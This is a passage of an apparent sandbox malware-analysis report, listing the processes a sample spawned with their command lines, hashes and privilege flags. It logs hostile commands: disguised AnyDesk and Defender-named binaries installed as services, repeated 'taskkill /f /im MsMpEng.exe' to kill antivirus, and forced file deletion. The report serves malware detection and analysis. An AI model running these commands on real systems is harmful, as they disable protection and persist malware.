                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 29%, ReversingLabs
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:8
                                                                                                    Start time:20:26:02
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2404
                                                                                                    Imagebase:0x7ff7aa950000
                                                                                                    File size:60'416 bytes
                                                                                                    MD5 hash:8EB4565C6C7096C17AC94718B2A3724B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:9
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:10
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:11
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:12
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:13
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:14
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:15
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:16
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:17
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe"
                                                                                                    Imagebase:0x7ff76e180000
                                                                                                    File size:143'872 bytes
                                                                                                    MD5 hash:9CEBC167FF7C8AE3CCFFB718FD7B52D0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:18
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:19
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:20
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:21
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:22
                                                                                                    Start time:20:26:07
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2128
                                                                                                    Imagebase:0x7ff7aa950000
                                                                                                    File size:60'416 bytes
                                                                                                    MD5 hash:8EB4565C6C7096C17AC94718B2A3724B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:23
                                                                                                    Start time:20:26:10
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:24
                                                                                                    Start time:20:26:10
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:25
                                                                                                    Start time:20:26:10
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff71dd80000
                                                                                                    File size:161'792 bytes
                                                                                                    MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 32%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:26
                                                                                                    Start time:20:26:10
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:27
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:28
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:29
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:30
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:31
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:32
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\oobe\AnyDeskUpdateService.exe"
                                                                                                    Imagebase:0x7ff71dd80000
                                                                                                    File size:161'792 bytes
                                                                                                    MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:33
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:34
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:35
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6552
                                                                                                    Imagebase:0x7ff7aa950000
                                                                                                    File size:60'416 bytes
                                                                                                    MD5 hash:8EB4565C6C7096C17AC94718B2A3724B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:36
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:37
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:38
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:39
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:40
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:41
                                                                                                    Start time:20:26:11
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:43
                                                                                                    Start time:20:26:15
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:44
                                                                                                    Start time:20:26:15
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:45
                                                                                                    Start time:20:26:15
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:46
                                                                                                    Start time:20:26:15
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:47
                                                                                                    Start time:20:26:15
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:48
                                                                                                    Start time:20:26:15
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:49
                                                                                                    Start time:20:26:16
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:50
                                                                                                    Start time:20:26:16
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:51
                                                                                                    Start time:20:26:16
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff71dd80000
                                                                                                    File size:161'792 bytes
                                                                                                    MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:52
                                                                                                    Start time:20:26:16
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:53
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:54
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:55
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:56
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:57
                                                                                                    Start time:20:26:18
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
